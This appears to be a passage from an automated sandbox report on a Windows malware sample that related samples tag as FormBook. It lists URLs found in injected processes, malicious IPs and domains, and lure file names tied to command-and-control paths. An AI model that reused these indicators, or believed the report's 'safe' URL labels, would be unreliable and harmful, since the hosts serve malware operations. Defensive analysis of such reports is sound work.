                                                              https://support.hostgator.com/cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.hiretemp.net/Immediate_Hiring_Employees.cfm?fp=4sYsJ6hmAV92GOPbYgqhq6Pa7rFOcv%2FiQ1gUTNg2cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.orgNhrnLLOsLetD.exe, 0000000A.00000002.3819616771.0000000005844000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/lol/202.htmlcmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/lol/NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://maya24.xyz/bzo0/?XvhP6L=LIXiKjrn46ImfNwK8V7IO/63eExm4wt8Rco3TcvXyZwdjjwGs6M9l9CGkhiW2SEXU7ruhcmdkey.exe, 00000008.00000002.3818027240.00000000044FC000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003D8C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.chinaen.org/NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/zb_system/login.phpcmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.ecosia.org/newtab/cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.chinaen.org/zb_users/theme/yd1125free/style/style.min.css?v=1.2.4cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.hiretemp.net/Hiring_Firm.cfm?fp=4sYsJ6hmAV92GOPbYgqhq6Pa7rFOcv%2FiQ1gUTNg2fXYprH4vjFihEX2cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.hiretemp.net/px.js?ch=1cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.hiretemp.net/px.js?ch=2cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/lol/199.htmlcmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/lol/196.htmlcmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/zb_system/script/zblogphp.jscmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://dts.gnpge.comNhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.htmlNhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://searchdiscovered.com/__media__/images/logo.gif)cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/zb_system/script/jquery-2.2.4.min.jscmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://cdn.consentmanager.netcmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.chinaen.org/lol/200.htmlcmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/lol/201.htmlcmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.htmlit.com.cn/cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://js.users.51.la/21851687.jscmdkey.exe, 00000008.00000002.3818027240.00000000041D8000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://i1.cdn-image.com/__media__/pics/28903/search.png)cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://delivery.consentmanager.netcmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.hiretemp.net/sk-logabpstatus.php?a=azI2OHRXUHVzMTBzQXZ5ektDRlFPdm5kMWRrSHFZcXJyR0pab3RFT2cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.hiretemp.net/display.cfmcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icocmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/zb_users/theme/yd1125free/script/custom.js?v=1.2.4cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/lol/195.htmlcmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/lol/203.htmlcmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-4.3.3.min.csscmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.zblogcn.com/cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://ac.ecosia.org/autocomplete?q=cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a5.htmlcmdkey.exe, 00000008.00000002.3818027240.00000000041D8000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a8.htmlcmdkey.exe, 00000008.00000002.3818027240.00000000041D8000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              162.240.81.18
                                                              		jeandreo.storeUnited States
                                                              		46606UNIFIEDLAYER-AS-1UStrue
                                                              162.0.213.94
                                                              		www.zimra.xyzCanada
                                                              		35893ACPCAtrue
                                                              76.223.113.161
                                                              		justlivn.netUnited States
                                                              		16509AMAZON-02UStrue
                                                              84.32.84.32
                                                              		legitima.legalLithuania
                                                              		33922NTT-LT-ASLTtrue
                                                              199.59.243.226
                                                              		www.personal-loans-jp8.xyzUnited States
                                                              		395082BODIS-NJUStrue
                                                              154.23.184.218
                                                              		57ddu.topUnited States
                                                              		174COGENT-174UStrue
                                                              208.91.197.13
                                                              		www.hiretemp.netVirgin Islands (BRITISH)
                                                              		40034CONFLUENCE-NETWORK-INCVGtrue
                                                              65.108.194.49
                                                              		maya24.xyzUnited States
                                                              		11022ALABANZA-BALTUStrue
                                                              152.53.38.0
                                                              		nuv3.topUnited States
                                                              		81NCRENUStrue
                                                              188.114.96.3
                                                              		www.chinaen.orgEuropean Union
                                                              		13335CLOUDFLARENETUStrue
                                                              23.225.34.75
                                                              		www.bashei.topUnited States
                                                              		40065CNSERVERSUStrue
                                                              172.67.221.5
                                                              		www.hemistryb.onlineUnited States
                                                              		13335CLOUDFLARENETUStrue
                                                              3.33.130.190
                                                              		tigre777gg.onlineUnited States
                                                              		8987AMAZONEXPANSIONGBtrue
                                                              35.214.33.204
                                                              		www.autochemtools.comUnited States
                                                              		19527GOOGLE-2UStrue

                                                              General Information

                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                              Analysis ID:1509673
                                                              Start date and time:2024-09-11 22:53:09 +02:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 11m 48s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:16
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:2
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:r9856_7.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@11/7@18/14
                                                              EGA Information:
                                                              • Successful, ratio: 75%
                                                              HCA Information:
                                                              • Successful, ratio: 91%
                                                              • Number of executed functions: 92
                                                              • Number of non-executed functions: 280
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 13.95.65.251, 40.119.6.228
                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: r9856_7.exe

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              16:54:14API Interceptor1x Sleep call for process: r9856_7.exe modified
                                                              16:54:16API Interceptor11x Sleep call for process: powershell.exe modified
                                                              16:55:09API Interceptor12614966x Sleep call for process: cmdkey.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              162.240.81.18PDF PURCHASE INQUIRY PDF.exeGet hashmaliciousFormBookBrowse
                                                              • www.7hubmt.online/xbib/
                                                              MV ALIADO-S-REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                                                              • www.7hubmt.online/xbib/
                                                              New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                              • www.sorriragora.online/3i7y/?lt=7+2uneOBixDDmhLFRXF/ufkAm5AC1SXFsWvwANuZC0TQ0YERrtM9rlugcy5pD3j7o6sEidpw3wSWmiKn6bu88qr2mjlQFSGqmkD6eyB8L9Z0Lf+o3Q/3u6k=&3ry=nj20Xr
                                                              DHL airwaybill # 6913321715 & BL Draft copy.exeGet hashmaliciousFormBookBrowse
                                                              • www.sorriragora.online/wxmz/
                                                              yyyyyyyy.exeGet hashmaliciousFormBookBrowse
                                                              • www.bellaflory.online/ituf/?zx=TzUh&EN-hu=YEtZDn0tA7DyZih9mnEB6iyoKUlvFjNFey9C//wFiDDFSyoO5eWV3ZKTc+ZVO1r+PL1l+P0OBuxLEWCpqZjHLSt270GmuGdydD8IJidQLk1z2EFl8w==
                                                              rfOfF6s6gI.exeGet hashmaliciousFormBookBrowse
                                                              • www.agoraeubebo.com/rs2o/
                                                              4qV0xW2NSj.exeGet hashmaliciousFormBookBrowse
                                                              • www.agoraeubebo.com/rs2o/
                                                              MV ALIADO - S-REQ-19-00064 List items.exeGet hashmaliciousFormBookBrowse
                                                              • www.7hubmt.online/xbib/
                                                              MV ALIADO - S-REQ-19-00064.7Z.exeGet hashmaliciousFormBookBrowse
                                                              • www.7hubmt.online/xbib/
                                                              176654 Grade B2FA, BRF-MBO2 & CX2OB.exeGet hashmaliciousFormBookBrowse
                                                              • www.7hubmt.online/xbib/
                                                              162.0.213.94PO#86637.exeGet hashmaliciousFormBookBrowse
                                                              • www.syvra.xyz/h2bb/
                                                              New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                              • www.kryto.top/09dt/?lt=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&3ry=nj20Xr
                                                              Scan 00093847.exeGet hashmaliciousFormBookBrowse
                                                              • www.kryto.top/09dt/
                                                              Quote #011698.exeGet hashmaliciousFormBookBrowse
                                                              • www.syvra.xyz/h2bb/
                                                              PO#86637.exeGet hashmaliciousFormBookBrowse
                                                              • www.syvra.xyz/h2bb/
                                                              PO#86637.exeGet hashmaliciousFormBookBrowse
                                                              • www.syvra.xyz/h2bb/
                                                              0XLuA614VK.exeGet hashmaliciousFormBookBrowse
                                                              • www.rigintech.info/ig9u/
                                                              RFQ- PNOC- MR 29215 - PJ 324 AL SAILIYA MOSQUE Project.exeGet hashmaliciousFormBookBrowse
                                                              • www.zyfro.info/hnng/
                                                              PO#86637.exeGet hashmaliciousFormBookBrowse
                                                              • www.syvra.xyz/h2bb/
                                                              PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
                                                              • www.syvra.xyz/h2bb/

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              www.chinaen.orgJsn496Em5T.exeGet hashmaliciousFormBookBrowse
                                                              • 188.114.96.3
                                                              yyyyyyyy.exeGet hashmaliciousFormBookBrowse
                                                              • 188.114.96.3
                                                              6i4QCFbsNi.exeGet hashmaliciousFormBookBrowse
                                                              • 188.114.97.3
                                                              PO #86637.exeGet hashmaliciousFormBookBrowse
                                                              • 188.114.96.3
                                                              Curriculum Vitae.exeGet hashmaliciousFormBookBrowse
                                                              • 188.114.96.3
                                                              www.personal-loans-jp8.xyzQuotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                                                              • 199.59.243.226

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              NTT-LT-ASLTOrder#Qxz091124.exeGet hashmaliciousFormBookBrowse
                                                              • 84.32.84.32
                                                              https://cartoon-kingdom.frGet hashmaliciousUnknownBrowse
                                                              • 84.32.84.18
                                                              INV & BANK DETAILS LETTER.pdf.exeGet hashmaliciousFormBookBrowse
                                                              • 84.32.84.32
                                                              Remittance advice.exeGet hashmaliciousFormBookBrowse
                                                              • 84.32.84.32
                                                              https://prd.edu.vn/NEPSD5/Login.phpGet hashmaliciousUnknownBrowse
                                                              • 84.32.84.183
                                                              PDF PURCHASE INQUIRY PDF.exeGet hashmaliciousFormBookBrowse
                                                              • 84.32.84.32
                                                              September Order.exeGet hashmaliciousFormBookBrowse
                                                              • 84.32.84.32
                                                              PO#86637.exeGet hashmaliciousFormBookBrowse
                                                              • 84.32.84.32
                                                              https://www.uploadhub.io/XEcj6thD3vJF3Ke/fileGet hashmaliciousHTMLPhisherBrowse
                                                              • 84.32.84.216
                                                              Jsn496Em5T.exeGet hashmaliciousFormBookBrowse
                                                              • 84.32.84.32
                                                              AMAZON-02UShttps://secure.mycoionline.com/Vendor/Registration.aspx?uid=03796536-84e9-4d41-a2cd-7394e5116c1bGet hashmaliciousUnknownBrowse
                                                              • 13.227.219.28
                                                              https://secure.mycoionline.com/Vendor/Registration.aspx?uid=03796536-84e9-4d41-a2cd-7394e5116c1b__;!!E09OEw!bw59estBs7wU6LnzZk_yfwA9cmAIJWbL__OCK09_BsNjygp1sDaqJooyecoOZJob63F5kLOsNwLNZilzJwVFfuXJAA$Get hashmaliciousUnknownBrowse
                                                              • 3.164.206.76
                                                              https://ner.economy.aeGet hashmaliciousUnknownBrowse
                                                              • 18.239.94.69
                                                              http://sharepoint-heroldlaw.com/Get hashmaliciousHTMLPhisherBrowse
                                                              • 76.223.105.230
                                                              http://www.mycoitracking.com/contact/Get hashmaliciousUnknownBrowse
                                                              • 18.239.94.35
                                                              https://docs.google.com/drawings/d/1XTtg4o4D3rVDatT-1eTIZjr2WQ95puAA8jccViOFGvQ/preview?jv22tGet hashmaliciousUnknownBrowse
                                                              • 108.156.21.124
                                                              https://indd.adobe.com/view/6c21274b-6175-4081-9994-3a7e763e60e9Get hashmaliciousUnknownBrowse
                                                              • 18.239.83.75
                                                              D0F48A0632B6C451791F4257697E861961F06A6F.htmlGet hashmaliciousUnknownBrowse
                                                              • 13.32.99.118
                                                              https://ii3pv.app.link:443/3p?%243p=e_et&%24original_url=https://slatenetworks.net/?uid=Get hashmaliciousUnknownBrowse
                                                              • 65.9.66.129
                                                              https://connect.intuit.com/portal/app/CommerceNetwork/view/scs-v1-f625d0b32548440b99916848ded025c855d4f60b1cb74ebabee20f0e6b929ffde5bb5649b6334735bc6416c99d558b11?locale=EN_USGet hashmaliciousUnknownBrowse
                                                              • 54.188.205.94
                                                              UNIFIEDLAYER-AS-1USPlay_VM-Now(Michelle.axmaker)CLQD.htmlGet hashmaliciousUnknownBrowse
                                                              • 192.185.13.172
                                                              Play_VM-Now(Atomicdata)CLQD.htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 108.167.172.137
